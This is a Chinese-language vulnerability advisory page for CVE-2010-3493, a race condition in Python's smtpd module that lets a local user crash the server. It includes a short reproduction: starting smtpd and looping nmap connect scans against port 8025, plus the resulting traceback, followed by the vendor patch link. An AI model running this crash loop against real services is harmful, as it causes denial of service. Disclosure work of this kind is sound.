发布日期:2010-10-29
更新日期:2010-11-01受影响系统:
Python Software Foundation Python 3.2
Python Software Foundation Python 3.1
Python Software Foundation Python 2.7
Python Software Foundation Python 2.6
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 44533
CVE ID: CVE-2010-3493Python是一种开放源代码的脚本编程语言。Python的SMTPChannel类中的__init__()函数在获取对等端名称时存在竞争条件,本地用户可以触发异常情况导致进程崩溃。<*来源:Giampaolo Rodola
链接:http://secunia.com/advisories/41968/
*>测试方法:
--------------------------------------------------------------------------------警 告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!- 在一个shell上运行python -m smtpd -n
- 在另一个上运行for i in {1..1000};do nmap -sT -p 8025 localhost;done服务器会打印以下输出并终止:giampaolo@ubuntu:~/svn/python-2.7$ ./python -m smtpd -n
error: uncaptured python exception, closing channel <__main__.PureProxy listening localhost:8025 at 0xb74b0f4c> (<class "socket.error">:[Errno 107] Transport endpoint is not connected [/home/giampaolo/svn/python-2.7/Lib/asyncore.py|read|79] [/home/giampaolo/svn/python-2.7/Lib/asyncore.py|handle_read_event|430] [/home/giampaolo/svn/python-2.7/Lib/smtpd.py|handle_accept|296] [/home/giampaolo/svn/python-2.7/Lib/smtpd.py|__init__|124] [/home/giampaolo/svn/python-2.7/Lib/socket.py|meth|222])
giampaolo@ubuntu:~/svn/python-2.7$建议:
--------------------------------------------------------------------------------
厂商补丁:Python Software Foundation
--------------------------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:http://bugs.python.org/issue9129Symantec IM Manager管理界面IMAdminReportTrendFormRun.asp页面SQL注入漏洞IBM Tivoli目录服务器代理服务器组件空指针引用拒绝服务漏洞相关资讯 python
- Python 为什么要迁移到 Github (01月26日)
- Python 程序员最常犯的十个错误 (12/11/2015 18:32:46)
- Python 面向对象编程 (10/06/2015 21:19:35)
| - Python 决定迁移到 GitHub (01月03日)
- Python面试必须要看的15个问题 (11/26/2015 22:23:21)
- Python 开发者节省时间的 10 个方 (10/04/2015 06:58:39)
|
本文评论 查看全部评论 (0)
评论声明- 尊重网上道德,遵守中华人民共和国的各项有关法律法规
- 承担一切因您的行为而直接或间接导致的民事或刑事法律责任
- 本站管理人员有权保留或删除其管辖留言中的任意内容
- 本站有权在网站内转载或引用您的评论
- 参与本评
|
易网时代-编程资源站